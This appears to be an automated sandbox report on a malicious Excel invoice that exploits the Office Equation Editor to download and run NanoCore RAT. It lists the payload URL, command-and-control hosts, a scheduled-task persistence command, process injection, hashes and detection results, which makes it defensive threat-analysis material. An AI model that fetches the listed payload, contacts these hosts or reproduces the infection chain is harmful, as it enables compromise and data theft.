          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          Source: RegSvcs.exe, 00000007.00000002.2394933863.0000000002814000.00000004.00000001.sdmpBinary or memory string: Program ManagerH
          Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: RegSvcs.exe, 00000007.00000002.2394977223.000000000285A000.00000004.00000001.sdmpBinary or memory string: Program Managera
          Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: RegSvcs.exe, 00000007.00000002.2393868574.00000000006A8000.00000004.00000020.sdmpBinary or memory string: FoProgram Manager8
          Source: RegSvcs.exe, 00000007.00000002.2393868574.00000000006A8000.00000004.00000020.sdmpBinary or memory string: Program Manager- SOL2021-03-14-NETC-NI-21-049-CEVA INV - SOL2021-03-14-NETC-NI-21-049-CEVA INV:2
          Source: RegSvcs.exe, 00000007.00000002.2394933863.0000000002814000.00000004.00000001.sdmpBinary or memory string: Program Manager<
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
          Source: Yara matchFile source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Detected Nanocore RatShow sources
          Source: vbc.exe, 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: RegSvcs.exe, 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: RegSvcs.exe, 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
          Source: Yara matchFile source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_004F256E bind,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_004F253B bind,

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsExploitation for Client Execution13Scheduled Task/Job1Extra Window Memory Injection1Disable or Modify Tools1Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery14Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsScheduled Task/Job1Logon Script (Windows)Process Injection312Obfuscated Files or Information31Security Account ManagerSecurity Software Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Scheduled Task/Job1Software Packing13NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading112Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol222Jamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 385193 Sample: SOL2021-03-14-NETC-NI-21-04... Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 17 other signatures 2->61 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 174 55 2->12         started        14 smtpsvc.exe 2 2->14         started        process3 dnsIp4 45 covid19vaccinations.hopto.org 13.235.115.155, 49167, 80 AMAZON-02US United States 7->45 35 C:\Users\user\AppData\Local\...\nano[1].exe, PE32 7->35 dropped 37 C:\Users\Public\vbc.exe, PE32 7->37 dropped 65 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->65 16 vbc.exe 5 7->16         started        39 ~$SOL2021-03-14-NE...1-049-CEVA INV.xlsx, data 12->39 dropped file5 signatures6 process7 file8 27 C:\Users\user\AppData\Roaming\gmSlQSien.exe, PE32 16->27 dropped 29 C:\Users\user\AppData\Local\...\tmp2720.tmp, XML 16->29 dropped 47 Machine Learning detection for dropped file 16->47 49 Uses schtasks.exe or at.exe to add and modify task schedules 16->49 51 Writes to foreign memory regions 16->51 53 2 other signatures 16->53 20 RegSvcs.exe 1 8 16->20         started        25 schtasks.exe 16->25         started        signatures9 process10 dnsIp11 41 79.134.225.30, 1144 FINK-TELECOM-SERVICESCH Switzerland 20->41 43 nassiru1155.ddns.net 20->43 31 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 20->31 dropped 33 C:\Program Files (x86)\...\smtpsvc.exe, PE32 20->33 dropped 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->63 file12 signatures13

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx29%VirustotalBrowse
          SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx23%ReversingLabsDocument-Office.Exploit.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\gmSlQSien.exe100%Joe Sandbox ML
          C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%MetadefenderBrowse
          C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
          7.2.RegSvcs.exe.840000.3.unpack100%AviraTR/NanoCore.fadteDownload File

          Domains

          SourceDetectionScannerLabelLink
          covid19vaccinations.hopto.org2%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          nassiru1155.ddns.net0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://covid19vaccinations.hopto.org/nano.exe13%VirustotalBrowse
          http://covid19vaccinations.hopto.org/nano.exe100%Avira URL Cloudmalware
          79.134.225.300%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          covid19vaccinations.hopto.org
          13.235.115.155
          truetrueunknown
          nassiru1155.ddns.net
          unknown
          unknowntrue
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            nassiru1155.ddns.nettrue
            • Avira URL Cloud: safe
            unknown
            http://covid19vaccinations.hopto.org/nano.exetrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            79.134.225.30true
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.%s.comPAvbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            low
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmpfalse
              high
              https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                13.235.115.155
                covid19vaccinations.hopto.orgUnited States
                16509AMAZON-02UStrue
                79.134.225.30
                unknownSwitzerland
                6775FINK-TELECOM-SERVICESCHtrue

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:385193
                Start date:12.04.2021
                Start time:08:01:11
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 9m 12s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.expl.evad.winXLSX@9/29@15/2
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 1.7% (good quality ratio 1.1%)
                • Quality average: 41.9%
                • Quality standard deviation: 34.8%
                HCA Information:
                • Successful, ratio: 97%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsx
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                • TCP Packets have been reduced to 100
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                08:02:19API Interceptor68x Sleep call for process: EQNEDT32.EXE modified
                08:02:23API Interceptor24x Sleep call for process: vbc.exe modified
                08:02:25API Interceptor1x Sleep call for process: schtasks.exe modified
                08:02:31API Interceptor1206x Sleep call for process: RegSvcs.exe modified
                08:02:35AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                79.134.225.30TSskTqG9V9.exeGet hashmaliciousBrowse
                  Files Specification.xlsxGet hashmaliciousBrowse
                    J62DQ7fO0b.exeGet hashmaliciousBrowse
                      oE6O5K1emC.exeGet hashmaliciousBrowse
                        AIC7VMxudf.exeGet hashmaliciousBrowse
                          Payment Confirmation.exeGet hashmaliciousBrowse
                            JOIN.exeGet hashmaliciousBrowse
                              Itinerary.pdf.exeGet hashmaliciousBrowse
                                vVH0wIFYFd.exeGet hashmaliciousBrowse
                                  GWee9QSphp.exeGet hashmaliciousBrowse
                                    s7pnYY2USl.jarGet hashmaliciousBrowse
                                      s7pnYY2USl.jarGet hashmaliciousBrowse
                                        SecuriteInfo.com.BehavesLike.Win32.Generic.dc.exeGet hashmaliciousBrowse
                                          Import and Export Regulation.xlsxGet hashmaliciousBrowse
                                            BBdzKOGQ36.exeGet hashmaliciousBrowse
                                              BL.exeGet hashmaliciousBrowse
                                                Payment Invoice.exeGet hashmaliciousBrowse
                                                  Payment Invoice.pdf.exeGet hashmaliciousBrowse
                                                    Inquiries_scan_011023783591374376585.exeGet hashmaliciousBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      covid19vaccinations.hopto.orgFiles Specification.xlsxGet hashmaliciousBrowse
                                                      • 34.220.10.254
                                                      APR 21SOA.xlsxGet hashmaliciousBrowse
                                                      • 144.168.163.101

                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      FINK-TELECOM-SERVICESCHOjAJYVQ7iK.exeGet hashmaliciousBrowse
                                                      • 79.134.225.112
                                                      TSskTqG9V9.exeGet hashmaliciousBrowse
                                                      • 79.134.225.30
                                                      Files Specification.xlsxGet hashmaliciousBrowse
                                                      • 79.134.225.30
                                                      J62DQ7fO0b.exeGet hashmaliciousBrowse
                                                      • 79.134.225.30
                                                      oE6O5K1emC.exeGet hashmaliciousBrowse
                                                      • 79.134.225.30
                                                      zunUbtZ2Y3.exeGet hashmaliciousBrowse
                                                      • 79.134.225.40
                                                      EASTERS.exeGet hashmaliciousBrowse
                                                      • 79.134.225.118
                                                      LIST OF POEA DELISTED AGENCIES.pdf.exeGet hashmaliciousBrowse
                                                      • 79.134.225.9
                                                      AWB.pdf.exeGet hashmaliciousBrowse
                                                      • 79.134.225.102
                                                      AIC7VMxudf.exeGet hashmaliciousBrowse
                                                      • 79.134.225.30
                                                      9mm case for ROYAL METAL INDUSTRIES 3milmonth Specification drawings.exeGet hashmaliciousBrowse
                                                      • 79.134.225.21
                                                      PO50164.exeGet hashmaliciousBrowse
                                                      • 79.134.225.79
                                                      Fast color scan to a PDFfile_1_20210331084231346.pdf.exeGet hashmaliciousBrowse
                                                      • 79.134.225.102
                                                      n7dIHuG3v6.exeGet hashmaliciousBrowse
                                                      • 79.134.225.92
                                                      F6JT4fXIAQ.exeGet hashmaliciousBrowse
                                                      • 79.134.225.92
                                                      order_inquiry2094.xls.exeGet hashmaliciousBrowse
                                                      • 79.134.225.102
                                                      5H957qLghX.exeGet hashmaliciousBrowse
                                                      • 79.134.225.25
                                                      yBio5dWAOl.exeGet hashmaliciousBrowse
                                                      • 79.134.225.7
                                                      wDIaJji4Vv.exeGet hashmaliciousBrowse
                                                      • 79.134.225.7
                                                      DkZY1k3y9F.exeGet hashmaliciousBrowse
                                                      • 79.134.225.23
                                                      AMAZON-02USremittance info.xlsxGet hashmaliciousBrowse
                                                      • 52.59.165.42
                                                      Required Order Quantity.xlsxGet hashmaliciousBrowse
                                                      • 52.59.165.42
                                                      PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                      • 108.128.238.226
                                                      Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                      • 18.184.197.212
                                                      Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                      • 52.59.165.42
                                                      NEW ORDER.xlsxGet hashmaliciousBrowse
                                                      • 52.59.165.42
                                                      Purchase Order SC_695853.xlsxGet hashmaliciousBrowse
                                                      • 52.59.165.42
                                                      winlog.exeGet hashmaliciousBrowse
                                                      • 3.14.206.30
                                                      J6wDHe2QdA.exeGet hashmaliciousBrowse
                                                      • 3.22.15.135
                                                      hsOBwEXSsq.exeGet hashmaliciousBrowse
                                                      • 3.142.167.54
                                                      1B4AF276CB3E0BFC9709174B8F75E13C4B224F4B35A6E.exeGet hashmaliciousBrowse
                                                      • 3.13.191.225
                                                      36ne6xnkop.exeGet hashmaliciousBrowse
                                                      • 99.83.185.45
                                                      1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                      • 3.13.255.157
                                                      Wire Transfer Update.exeGet hashmaliciousBrowse
                                                      • 3.13.255.157
                                                      Five.exeGet hashmaliciousBrowse
                                                      • 52.84.150.34
                                                      Pd0Tb0v0WW.exeGet hashmaliciousBrowse
                                                      • 52.58.78.16
                                                      Alexandra38.docxGet hashmaliciousBrowse
                                                      • 65.9.66.79
                                                      Alexandra38.docxGet hashmaliciousBrowse
                                                      • 65.9.66.79
                                                      LtfVNumoON.exeGet hashmaliciousBrowse
                                                      • 13.56.33.8
                                                      mW07jhVxX5.exeGet hashmaliciousBrowse
                                                      • 35.157.204.206

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      C:\Program Files (x86)\SMTP Service\smtpsvc.exe69JCWICJ9872001.exeGet hashmaliciousBrowse
                                                        Proforma 0089 05 2019.xlsxGet hashmaliciousBrowse

                                                          Created / dropped Files

                                                          C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):3.7499114035101173
                                                          Encrypted:false
                                                          SSDEEP:384:DOj9Y8/gS7SDriLGKq1MHR534Jg6ihJSxUCR1rgCPKabK2t0X5P7DZ+JgySW7XxW:D+gSAdN1MH3IJFRJngyX
                                                          MD5:72A9F09010A89860456C6474E2E6D25C
                                                          SHA1:E4CB506146F60D01EA9E6132020DEF61974A88C3
                                                          SHA-256:7299EB6E11C8704E7CB18F57879550CDD88EF7B2AE8CBA031B795BC5D92CE8E3
                                                          SHA-512:BCD7EC694288BAF751C62E7CE003B4E932E86C60E0CFE67360B135FE2B9EB3BCC97DCDB484CFC9C50DC18289E824439A07EB5FF61DD2C2632F3E83ED77F0CA37
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: 69JCWICJ9872001.exe, Detection: malicious, Browse
                                                          • Filename: Proforma 0089 05 2019.xlsx, Detection: malicious, Browse
                                                          Reputation:low
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..S.................P... .......k... ........@.. ...............................X....@..................................k..K................................... k............................................... ............... ..H............text....K... ...P.................. ..`.rsrc................`..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe
                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:downloaded
                                                          Size (bytes):802304
                                                          Entropy (8bit):7.807064216316379
                                                          Encrypted:false
                                                          SSDEEP:12288:fqPhNb1Cpc0vs3YpRTYmuCBWhfCfyxmbKzYwafnJMKrXe3tw2luRVZzQKaq:iPhxcpHUIpRTY0c1uyUeU3nJMKoCaq
                                                          MD5:A3CBEB3E732B11954572B3EE6755242C
                                                          SHA1:EBB41B49DE8F1B09EA20DABFFCFD85B93B68D7F3
                                                          SHA-256:E006460AD1E34DDBBC28430C2D529A7EE491893C7AE8B6902B2D8D8C56620510
                                                          SHA-512:455C3CAE5F85B8F3334004E09C5EF42BB6E8410F7501AEF0D520E1023EB376E31D6FA892DAB8DC8AAEA94914F31EC7915E8424362F1046F25F9B55C58EF94BD6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          IE Cache URL:http://covid19vaccinations.hopto.org/nano.exe
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..2...........P... ...`....@.. ....................................@.................................@P..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............<..............@..B................tP......H........}..du...............]...........................................0............(....(..........(.....o ....*.....................(!......("......(#......($......(%....*N..(....o....(&....*&..('....*.s(........s)........s*........s+........s,........*....0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+..*.0......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27A56AD2.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):51166
                                                          Entropy (8bit):7.767050944061069
                                                          Encrypted:false
                                                          SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
